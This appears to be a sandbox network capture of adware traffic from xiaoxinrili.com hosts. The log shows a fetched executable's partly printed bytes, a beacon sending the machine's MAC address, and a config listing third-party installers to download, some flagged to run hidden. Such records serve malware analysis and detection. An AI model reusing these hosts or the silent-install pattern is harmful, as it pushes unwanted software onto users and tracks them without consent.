Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1

HTTP/1.1 200 OK

Content-Type: text/plain

Last-Modified: Tue, 01 Apr 2014 07:28:05 GMT

Accept-Ranges: bytes

ETag: "8b5be4eb7b4dcf1:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Wed, 14 Jan 2015 11:53:31 GMT

Content-Length: 34

1|5F0218693884A23493C4D700684C9076HTTP/1.1 200 OK..Content-Type: text/plain..Last-Modified: Tue, 01 Apr 2014 07:28:05 GMT..Accept-Ranges: bytes..ETag: "8b5be4eb7b4dcf1:0"..Server: Microsoft-IIS/7.5..X-Powered-By: ASP.NET..Date: Wed, 14 Jan 2015 11:53:31 GMT..Content-Length: 34..1|5F0218693884A23493C4D700684C9076....

GET /Install.txt HTTP/1.1

User-Agent: HOST

Host: update.xiaoxinrili.com

Cache-Control: no-cache

Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1

HTTP/1.1 200 OK

Content-Type: text/plain

Last-Modified: Wed, 24 Sep 2014 05:33:59 GMT

Accept-Ranges: bytes

ETag: "c1a82024b9d7cf1:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Wed, 14 Jan 2015 11:53:32 GMT

Content-Length: 34

0|71AF22E1A907CAE3F48F41360B58562BHTTP/1.1 200 OK..Content-Type: text/plain..Last-Modified: Wed, 24 Sep 2014 05:33:59 GMT..Accept-Ranges: bytes..ETag: "c1a82024b9d7cf1:0"..Server: Microsoft-IIS/7.5..X-Powered-By: ASP.NET..Date: Wed, 14 Jan 2015 11:53:32 GMT..Content-Length: 34..0|71AF22E1A907CAE3F48F41360B58562B....

GET /weather.txt HTTP/1.1

User-Agent: MERONG(0.9/;p)

Accept: */*

Host: update.xiaoxinrili.com

Connection: Keep-Alive

Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1; CNZZDATA5554906=cnzz_eid=53975052-1421233896-&ntime=1421233896

HTTP/1.1 200 OK

Content-Type: text/plain

Last-Modified: Thu, 13 Nov 2014 06:14:04 GMT

Accept-Ranges: bytes

ETag: "8ee53b69ffcf1:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Wed, 14 Jan 2015 11:53:34 GMT

Content-Length: 38

12154|1b5d950e15ba193e96405dd75be5ab1fHTTP/1.1 200 OK..Content-Type: text/plain..Last-Modified: Thu, 13 Nov 2014 06:14:04 GMT..Accept-Ranges: bytes..ETag: "8ee53b69ffcf1:0"..Server: Microsoft-IIS/7.5..X-Powered-By: ASP.NET..Date: Wed, 14 Jan 2015 11:53:34 GMT..Content-Length: 38..12154|1b5d950e15ba193e96405dd75be5ab1f....

GET /tj.html?%original file name%.exe HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: update.xiaoxinrili.com

Connection: Keep-Alive

Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1; CNZZDATA5554906=cnzz_eid=53975052-1421233896-&ntime=1421233896; CNZZDATA4881483=cnzz_eid=1393858484-1421236290-&ntime=1421236290

HTTP/1.1 200 OK

Content-Type: text/html

Content-Encoding: gzip

Last-Modified: Tue, 26 Aug 2014 06:29:52 GMT

Accept-Ranges: bytes

ETag: "3822fd24f7c0cf1:0"

Vary: Accept-Encoding

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Wed, 14 Jan 2015 11:53:37 GMT

Content-Length: 485

.............`.I.%&/m.{.J.J..t...`.$..@.........iG#).*..eVe]f.@......{....{....;.N'...?\fd.l..J...!....?~|.?"...O.<y...<M...<............~0..?.....E.f.t..M.~..Wo.m.|..=z..m...............T.k..c..i]......}4o....w.......?.O.......j..=..g....v....U>.....1F.."....d..k...u&..n....j.w.......GG.Y.....UWm5....tk..i.}.~.Y:...E.l.e5...Z.M.;...~D.B..w?J.._....}....|k...i...>..........1..q....Z...vv..?.....~..Z..f..`............]9.MA.....b...{j ..{....c....:.../...;w.=*....y..$V._.....i..(...HTTP/1.1 200 OK..Content-Type: text/html..Content-Encoding: gzip..Last-Modified: Tue, 26 Aug 2014 06:29:52 GMT..Accept-Ranges: bytes..ETag: "3822fd24f7c0cf1:0"..Vary: Accept-Encoding..Server: Microsoft-IIS/7.5..X-Powered-By: ASP.NET..Date: Wed, 14 Jan 2015 11:53:37 GMT..Content-Length: 485...............`.I.%&/m.{.J.J..t...`.$..@.........iG#).*..eVe]f.@......{....{....;.N'...?\fd.l..J...!....?~|.?"...O.<y...<M...<............~0..?.....E.f.t..M.~..Wo.m.|..=z..m...............T.k..c..i]......}4o....w.......?.O.......j..=..g....v....U>.....1F.."....d..k...u&..n....j.w.......GG.Y.....UWm5....tk..i.}.~.Y:...E.l.e5...Z.M.;...~D.B..w?J.._....}....|k...i...>..........1..q....Z...vv..?.....~..Z..f..`............]9.MA.....b...{j ..{....c....:.../...;w.=*....y..$V._.....i..(.......

<<< skipped >>>

GET /tmp.exe HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT)

Host: update.xiaoxinrili.com

Cache-Control: no-cache

Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1; CNZZDATA5554906=cnzz_eid=53975052-1421233896-&ntime=1421233896; CNZZDATA4881483=cnzz_eid=1393858484-1421236290-&ntime=1421236290; CNZZDATA4878044=cnzz_eid=1356438655-1421233298-&ntime=1421233298

HTTP/1.1 200 OK

Content-Type: application/octet-stream

Last-Modified: Mon, 31 Mar 2014 01:38:57 GMT

Accept-Ranges: bytes

ETag: "9a11defb814ccf1:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Wed, 14 Jan 2015 11:53:53 GMT

Content-Length: 105984

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................<.......-.......;.......................2.......,.......).....Rich............................PE..L...1.8S............................ "............@.......................................@.....................................P...................................................................0...@...............X............................text............................... ..`.rdata... .......,..................@..@.data...............................@....rsrc...............................@..@.reloc..&...........................@..B....................................................................................................................................................................................................................................................................................................................................................@..^........V......@..K....D$..t.V..........^...............SU.l$.VWj.j......h(...............VS..(................j.....@.....@...........~$......:.u...t..P.:Q.u.........u.3........V..u........._^]..[.S.......t<.....d$...:.u...t..P.:Q.u.........u.3..........t.VS.f.....u.S....@.V........_^]2.[......h....h..@.j.....@....@..P.........@..u. ......t.....@..:\t.AJ;.r.3.. .....@.....@................D$.....8.u.3.......VWP......t$,.=L.@....jdhp.@.jgV...@...jdh..@.jmV.........V..........u._^......jmV..H.@

<<< skipped >>>

GET /FMTFilterinset.txt HTTP/1.1

User-Agent: HOST

Host: update.xiaoxinrili.com

Cache-Control: no-cache

Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1; CNZZDATA5554906=cnzz_eid=53975052-1421233896-&ntime=1421233896; CNZZDATA4881483=cnzz_eid=1393858484-1421236290-&ntime=1421236290; CNZZDATA4878044=cnzz_eid=1356438655-1421233298-&ntime=1421233298; CNZZDATA5614889=cnzz_eid=808136781-1421233891-&ntime=1421233891

HTTP/1.1 200 OK

Content-Type: text/plain

Last-Modified: Sun, 04 Jan 2015 13:34:12 GMT

Accept-Ranges: bytes

ETag: "d09630202328d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Wed, 14 Jan 2015 11:54:01 GMT

Content-Length: 108

setup_zol-a1480.exe,setup_smx1208.exe,setup_smx1226.exe,setup_pp0104.exe,setup_smx0104.exe,setup_zjm0104.exeHTTP/1.1 200 OK..Content-Type: text/plain..Last-Modified: Sun, 04 Jan 2015 13:34:12 GMT..Accept-Ranges: bytes..ETag: "d09630202328d01:0"..Server: Microsoft-IIS/7.5..X-Powered-By: ASP.NET..Date: Wed, 14 Jan 2015 11:54:01 GMT..Content-Length: 108..setup_zol-a1480.exe,setup_smx1208.exe,setup_smx1226.exe,setup_pp0104.exe,setup_smx0104.exe,setup_zjm0104.exe..

GET /startup?appname=cmlsaXF1aWNrZW4=&version=4.0&sid=00-0C-29-FD-55-AD&pos=NmFjYWQwNGJiMDM1MDFkYzkyMDc3OGVkMTJiYTZkNjM=&s=5ADBD1D5A76F0851324A6BD5DB34474B HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: count.xiaoxinrili.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.4.2

Content-Type: text/html; charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.4.17

Set-Cookie: laravel_session=8d0iqlnbo9lkjfph1n67qapk35; expires=Wed, 14-Jan-2015 13:50:15 GMT; path=/; HttpOnly

Set-Cookie: laravel_session=8d0iqlnbo9lkjfph1n67qapk35; expires=Wed, 14-Jan-2015 13:50:15 GMT; path=/; httponly

Cache-Control: no-cache

Date: Wed, 14 Jan 2015 11:50:15 GMT

1..1..0..HTTP/1.1 200 OK..Server: nginx/1.4.2..Content-Type: text/html; charset=UTF-8..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.4.17..Set-Cookie: laravel_session=8d0iqlnbo9lkjfph1n67qapk35; expires=Wed, 14-Jan-2015 13:50:15 GMT; path=/; HttpOnly..Set-Cookie: laravel_session=8d0iqlnbo9lkjfph1n67qapk35; expires=Wed, 14-Jan-2015 13:50:15 GMT; path=/; httponly..Cache-Control: no-cache..Date: Wed, 14 Jan 2015 11:50:15 GMT..1..1..0..

GET /ico/xiangmu2.ico HTTP/1.0

Host: update.redshu.com

Keep-Alive: 300

Connection: keep-alive

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; KngStr_IAM)

HTTP/1.1 200 OK

Content-Type: image/x-icon

Last-Modified: Mon, 05 Jan 2015 10:01:09 GMT

Accept-Ranges: bytes

ETag: "14f8a87ce28d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Wed, 14 Jan 2015 11:53:26 GMT

Connection: keep-alive

Content-Length: 16958

......@@.... .(B......(...@......... ......B......................................................................................................................................................................................................................................................................................................................................................................................^`b.tuy.orw<lpvXSW^lTX]|MPV.JLR.OQX~WZ_r\ag`tw{Elnt'................................................................................................................................................................................................}../...f....NSW.:=B.%& ... ............... ..............$&./37.QUY.ux{.....z{~C__a.................................................................................................................................................................afp....ylqw.26<.. #...... !..!".."". "".. ..#$..!".# #.%!$.# ".#"#. !#. ! ..!!........../3.ccg........6eeg.............................................................................................................................................gpw2....PV].. '.. #...!.!""."!#. "%. #$..!"...!........... ... .....#.$..."..... .....! "." #.! #...!... .HHI........TZ^_.............................................................................................................................U^n%|...SZ[......!"..!!. ..,-.#"". .!...!...!..... .'.% -.0,6.308.-(0.(#,.!.(...!..."...#.....#&'...!.. ". "$.!"#.&().....FEI.

<<< skipped >>>

GET /16246473.js HTTP/1.1

Accept: */*

Referer: hXXp://update.xiaoxinrili.com/daohang/xttj.html?%original file name%.exe

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: js.users.51.la

Connection: Keep-Alive

HTTP/1.1 200 OK

Cache-Control: max-age=300

Content-Length: 1981

Content-Type: application/x-javascript

Last-Modified: Mon, 05 Jan 2015 07:54:16 GMT

Accept-Ranges: bytes

ETag: "14dbbcdbc28d01:14d7"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Date: Wed, 14 Jan 2015 11:51:21 GMT

Connection: close

document.write ('<a href="hXXp://VVV.51.la/?16246473" target="_blank"><img alt="51.la 专业、免费、强健的访问统计" src="hXXp://icon.ajiang.net/icon_9.gif" style="border:none" /></a>\n');..var a6473tf="51la";var a6473pu="";var a6473pf="51la";var a6473su=window.location;var a6473sf=document.referrer;var a6473of="";var a6473op="";var a6473ops=1;var a6473ot=1;var a6473d=new Date();var a6473color="";if (navigator.appName=="Netscape"){a6473color=screen.pixelDepth;} else {a6473color=screen.colorDepth;}..try{a6473tf=top.document.referrer;}catch(e){}..try{a6473pu =window.parent.location;}catch(e){}..try{a6473pf=window.parent.document.referrer;}catch(e){}..try{a6473ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a6473ops=(a6473ops==null)?1: (parseInt(unescape((a6473ops)[2])) 1);var a6473oe =new Date();a6473oe.setTime(a6473oe.getTime() 60*60*1000);document.cookie="AJSTAT_ok_pages=" a6473ops ";path=/;expires=" a6473oe.toGMTString();a6473ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a6473ot==null){a6473ot=1;}else{a6473ot=parseInt(unescape((a6473ot)[2])); a6473ot=(a6473ops==1)?(a6473ot 1):(a6473ot);}a6473oe.setTime(a6473oe.getTime() 365*24*60*60*1000);document.cookie="AJSTAT_ok_times=" a6473ot ";path=/;expires=" a6473oe.toGMTString();}catch(e){}..try{if(document.cookie==""){a6473ops=-1;a6473ot=-1;}}catch(e){}..a6473of=a6473sf;if(a6473pf!=="51la

<<< skipped >>>

GET /icon_9.gif HTTP/1.1

Accept: */*

Referer: hXXp://update.xiaoxinrili.com/daohang/xttj.html?%original file name%.exe

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: icon.ajiang.net

Connection: Keep-Alive

HTTP/1.1 200 OK

Cache-Control: max-age=14400

Content-Length: 893

Content-Type: image/gif

Last-Modified: Fri, 26 May 2006 14:28:04 GMT

Accept-Ranges: bytes

ETag: "0b24a99d080c61:1566"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Date: Wed, 14 Jan 2015 11:51:20 GMT

Connection: close

GIF89a0............`..6..4.........f.........................!..NETSCAPE2.0.....!.......,....0........I..8S.;'.'.cX.dj..hv ...A.5......I.@..r......vN..G....k...0.....n..XN.{K..>.n>..q..V...9GOaes..r5VW.=2\.o.......u....$Ik.2..#.............D.9.5.ZD............7.T.9.5...............!.......,....-.....].I2........f.H(..v.$6.-..i... ......oW..Z.`'..._..r.*..V.U..n..NX.5 ....a...b.Z.>...TYR...y...!.......,....-....._.I1........&...!.........0...[.....VEc...H Ng.....O2......V..vM.a:..JM...d}.o..j....kY\...zvxw..!.......,.... .....d.I2........f.H(..v..Eb.."...eJ.....X...../RH...S.YS.C.t.B...li...[. ...&l8s..3.M...[|.....:l~Z{o.....!.......,....-.....o.I1........&...!.U".."....i^.F.U....I...F....`9q....#15MI3.d.x,..D....K.m../.. .[.`.K...?Yc*)._.\'.p%\cs.&...'..!.......,.... .....j.I2........f.H(...J..J$6.1B.......0..gy..../.".bD.........T.u%..!.6..bD.\..s5.Y.F....7.V.-imd.f{9r.ayu.....;..

GET /hezi/xxurl.html?iexplore.exe HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: down.xiaoxinrili.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.4.1

Date: Wed, 14 Jan 2015 11:51:36 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Vary: Accept-Encoding

Cache-Control: max-age=1200

Last-Modified: Fri, 26 Sep 2014 06:40:17 GMT

Cache-by-CoreNode: HIT From cha-ld-mgslb-gdzh-core1-mnd3

Content-Encoding: gzip

Cache-by-Node: HIT From cha-ld-gdmzh-cs1-nd33

f7............]..j.0.E....0`l....l..]...F...8..&n......d7g...6..!.4...MaPS..3.>?5IG..h.s..../5.5..."hw.v!z... .(.D.R. %.^_.....Vd.c...^.a.r.Po.@y..}GK..8.....L.....^.....uV{..T.!.....L|.B.(.p.#E-s....;.t`K.i...H.N!..............}7.....l...g.._.#.di.....0..HTTP/1.1 200 OK..Server: nginx/1.4.1..Date: Wed, 14 Jan 2015 11:51:36 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Vary: Accept-Encoding..Cache-Control: max-age=1200..Last-Modified: Fri, 26 Sep 2014 06:40:17 GMT..Cache-by-CoreNode: HIT From cha-ld-mgslb-gdzh-core1-mnd3..Content-Encoding: gzip..Cache-by-Node: HIT From cha-ld-gdmzh-cs1-nd33..f7............]..j.0.E....0`l....l..]...F...8..&n......d7g...6..!.4...MaPS..3.>?5IG..h.s..../5.5..."hw.v!z... .(.D.R. %.^_.....Vd.c...^.a.r.Po.@y..}GK..8.....L.....^.....uV{..T.!.....L|.B.(.p.#E-s....;.t`K.i...H.N!..............}7.....l...g.._.#.di.....0..

GET /files/conn_engine/2.69.0.5490.zip HTTP/1.1

Range: bytes=0-

User-Agent: WDJConnEngine

Host: dl.wandoujia.com

Cache-Control: no-cache

HTTP/1.1 302 Found

Server: Tengine/1.4.6

Date: Wed, 14 Jan 2015 11:51:34 GMT

Content-Type: text/html

Content-Length: 266

Connection: keep-alive

Location: hXXp://dl.cdn.wandoujia.com/files/conn_engine/2.69.0.5490.zip

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<h1>302 Found</h1>..<p>The requested resource resides temporarily under a different URI.</p>..<hr/>Powered by Tengine/1.4.6..</body>..</html>..HTTP/1.1 302 Found..Server: Tengine/1.4.6..Date: Wed, 14 Jan 2015 11:51:34 GMT..Content-Type: text/html..Content-Length: 266..Connection: keep-alive..Location: hXXp://dl.cdn.wandoujia.com/files/conn_engine/2.69.0.5490.zip..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<h1>302 Found</h1>..<p>The requested resource resides temporarily under a different URI.</p>..<hr/>Powered by Tengine/1.4.6..</body>..</html>....

GET /conn_engine_config_ini.php?ver=0&vendor=100000511 HTTP/1.1

Range: bytes=0-

User-Agent: WDJConnEngine

Host: cfg.pub.wandoujia.com

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: Tengine/1.5.2

Date: Wed, 14 Jan 2015 11:51:33 GMT

Content-Type: text/html

Content-Length: 91

Connection: keep-alive

Pragma: public

Cache-Control: maxage=3600

Expires: Wed, 14 Jan 2015 12:51:33 GMT

Last-Modified: Wed, 08 Oct 2014 11:39:08 GMT

Etag: fec081d9f595daf7b341a9c631b6b888

[config].url=hXXp://dl.wandoujia.com/files/conn_engine/2.69.0.5490.zip.version=2.69.0.5490.HTTP/1.1 200 OK..Server: Tengine/1.5.2..Date: Wed, 14 Jan 2015 11:51:33 GMT..Content-Type: text/html..Content-Length: 91..Connection: keep-alive..Pragma: public..Cache-Control: maxage=3600..Expires: Wed, 14 Jan 2015 12:51:33 GMT..Last-Modified: Wed, 08 Oct 2014 11:39:08 GMT..Etag: fec081d9f595daf7b341a9c631b6b888..[config].url=hXXp://dl.wandoujia.com/files/conn_engine/2.69.0.5490.zip.version=2.69.0.5490...

GET /metro?sid=000C29FD55AD&s=B867EF90584DBE7ADA2C745D5A27E8C6&type=silent&appname=w5DCocOQw4LDiMOVw4DDug==&pos=NmFjYWQwNGJiMDM1MDFkYzkyMDc3OGVkMTJiYTZkNjM=&pn=inst HTTP/1.0

Host: count.xiaoxinrili.com

Keep-Alive: 300

Connection: keep-alive

User-Agent: AppName:........; Compiled:201412311429; WinVer:5.01.2600 paX86; AdapterCount:1;

HTTP/1.1 200 OK

Server: nginx/1.4.2

Content-Type: text/html; charset=UTF-8

Connection: close

X-Powered-By: PHP/5.4.17

Set-Cookie: laravel_session=jjnr74rehkj30evdm5ja63ssa1; expires=Wed, 14-Jan-2015 13:49:37 GMT; path=/; HttpOnly

Set-Cookie: laravel_session=jjnr74rehkj30evdm5ja63ssa1; expires=Wed, 14-Jan-2015 13:49:37 GMT; path=/; httponly

Cache-Control: private, must-revalidate

Date: Wed, 14 Jan 2015 11:49:37 GMT

pragma: no-cache

expires: -1

0..

GET /ini/read.php?t=slt&d=2014123114&c= HTTP/1.0

Host: ini.xiaoxinrili.com

Keep-Alive: 300

Connection: keep-alive

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; KngStr_IAM)

HTTP/1.1 200 OK

Server: nginx/1.4.2

Date: Wed, 14 Jan 2015 11:50:41 GMT

Content-Type: text/plain; charset=GBK

Content-Length: 5467

Connection: keep-alive

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, private

X-Cache-CFC: EXPIRED - 1421236241.157 - httpGETini.xiaoxinrili.com/ini/read.php?t=slt&d=2014123114&c=

[Main]..wpFinished=..Ads=..MainPage=..WS=1..NoneUI=Lnk_Hao123|Lnk_ahxy..pptv_NoneUI=..Un_Ads=..Un_MainPage=..Un_NoneUI=Lnk_Hao123|Lnk_cq....[Lst]..NoneUI=1..Un_NoneUI=2..Channel1=smx1119,t10315,t10350,smx1208,t10352,zjm0104..List1=..Channel2=smx1119,t10315,t10350,smx1208,t10352,zjm0104..List2=..[Mp]..MainCap1=....360......MainPage1=Url_1..MainLock1=0..WhiteList1=Url_2,Url_3,Url_4,Url_5..MainCap0=....360......MainPage0=Url_0..MainLock0=0..WhiteList0=Url_2,Url_3,Url_4,Url_5..[Url]..Url0=VVV.z7755.com..Url1=VVV.z7755.com..Url2=i1616.com..Url3=VVV.z7755.com..Url4=z8822.com..Url5=hXXp://hao.360.cn/?src=lm&ls=n162f37fb94..Url6=www.z7755.com..[Exe]..Cap1=................Url1=hXXp://hezi.91danji.com/bao/xx/WanDouJia_capher105_kb.exe..File1=WanDouJia_capher105_kb.exe..Param1=-hide....Cap5=....37wan..............Url5=hXXp://d.wanyouxi7.com/37wan/37cs_wd/901373/Setup_37wanWd.exe..File5=Setup_37wanWd.exe..Param5=..Cap6=FM..................Url6=hXXp://down.yinyue.fm/open/setup_2997.exe..File6=setup_2997.exe..Param6=..Cap7=..........Url7=hXXp://lkdownload.lkgame.com/SU_lk78_setup_LG0704.exe..File7=SU_lk78_setup_LG0704.exe..Param7=..Cap8=7k7k..........Url8=hXXp://box.7k7k.com/manage/download_box.php?from=xiaoxin01..File8=QKGameHall_5.6.4.2_xiaoxin01.exe..Param8=/YLXNotShowUI..Cap10=................360..........Url10=hXXp://down.360safe.com/p/360Inst_oemqd2.exe..Exe10=360Inst_oemqd2.exe..Param10=..Cap11=doyo..........Url11=hXXp://soft.doyo.cn/soft/doyo_3066_s.exe..File11=doyo_3066_s.exe..Param11=....Cap12=1666......Url12=http:

<<< skipped >>>

GET /stat.php?id=5554906&web_id=5554906 HTTP/1.1

Accept: */*

Referer: hXXp://update.xiaoxinrili.com/tj/a1.html?%original file name%.exe&type=silent&hp=00&al=Lnk_Hao123_1|Lnk_ahxy_1&errno=

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: s14.cnzz.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: Tengine

Content-Type: application/javascript

Content-Length: 10072

Connection: keep-alive

Date: Wed, 14 Jan 2015 11:11:36 GMT

Last-Modified: Wed, 14 Jan 2015 11:11:36 GMT

Cache-Control: max-age=5400,s-maxage=5400

Age: 2390

X-Cache: HIT TCP_MEM_HIT dirn:6:444083222

X-Swift-SaveTime: Wed, 14 Jan 2015 11:11:36 GMT

X-Swift-CacheTime: 5400

Via: cache6.de1[0,200-0,H], cache8.de1[0,0]

(function(){function k(){this.c="5554906";this.R="z";this.N="";this.K="";this.M="";this.r="1421233896";this.P="hzs14.cnzz.com";this.L="";this.u="CNZZDATA" this.c;this.t="_CNZZDbridge_" this.c;this.F="_cnzz_CV" this.c;this.G="CZ_UUID" this.c;this.v="0";this.A={};this.a={};this.la()}function g(a,b){try{var c=.[];c.push("siteid=5554906");c.push("name=" f(a.name));c.push("msg=" f(a.message));c.push("r=" f(h.referrer));c.push("page=" f(e.location.href));c.push("agent=" f(e.navigator.userAgent));c.push("ex=" f(b));c.push("rnd=" Math.floor(2147483648*Math.random()));(new Image).src="hXXp://jserr.cnzz.com/log.php?" c.join("&")}catch(d){}}var h=document,e=window,f=encodeURIComponent,l=decodeURIComponent,n=unescape,p=escape;k.prototype={la:function(){try{this.U(),this.J(),this.ia(),this.H(),this.o(),.this.ga(),this.fa(),this.ja(),this.j(),this.ea(),this.ha(),this.ka(),this.ca(),this.aa(),this.da(),this.qa(),e[this.t]=e[this.t]||{},this.ba("_cnzz_CV")}catch(a){g(a,"i failed")}},oa:function(){try{var a=this;e._czc={push:function(){return a.B.apply(a,arguments)}}}catch(b){g(b,"oP failed")}},aa:function(){try{var a=e._czc;if("[object Array]"==={}.toString.call(a))for(var b=0;b<a.length;b ){var c=a[b];switch(c[0]){case "_setAccount":e._cz_account="[object String]"==={}.toString.call(c[1])?c[1]:String(c[1]);.break;case "_setAutoPageview":"boolean"===typeof c[1]&&(e._cz_autoPageview=c[1])}}}catch(d){g(d,"cS failed")}},qa:function(){try{if("undefined"===typeof e._cz_account||e._cz_account===this.c){e._cz_account=this.c;if("[

<<< skipped >>>

GET /stat.htm?id=5614889&r=&lg=en-us&ntime=none&cnzz_eid=808136781-1421233891-&showp=1276x846&t=&h=1&rnd=531066514 HTTP/1.1

Accept: */*

Referer: hXXp://update.xiaoxinrili.com/daohang/jsq/tj.html?%original file name%.exe

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: hzs10.cnzz.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: Tengine/1.4.1

Date: Wed, 14 Jan 2015 11:51:56 GMT

Content-Type: image/gif

Content-Length: 43

Last-Modified: Tue, 28 May 2013 02:57:17 GMT

Connection: close

Accept-Ranges: bytes

GIF89a.............!.......,...........D..;..

GET /stat.php?id=4881483&web_id=4881483 HTTP/1.1

Accept: */*

Referer: hXXp://update.xiaoxinrili.com/qian.html?%original file name%.exe

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: s19.cnzz.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: Tengine

Content-Type: application/javascript

Transfer-Encoding: chunked

Connection: keep-alive

Date: Wed, 14 Jan 2015 11:51:30 GMT

Last-Modified: Wed, 14 Jan 2015 11:51:30 GMT

Cache-Control: max-age=5400,s-maxage=5400

X-Cache: MISS TCP_REFRESH_MISS dirn:-2:-2

X-Swift-SaveTime: Wed, 14 Jan 2015 11:51:31 GMT

X-Swift-CacheTime: 5399

Via: cache7.de1[1596,200-0,M], cache5.de1[1597,0]

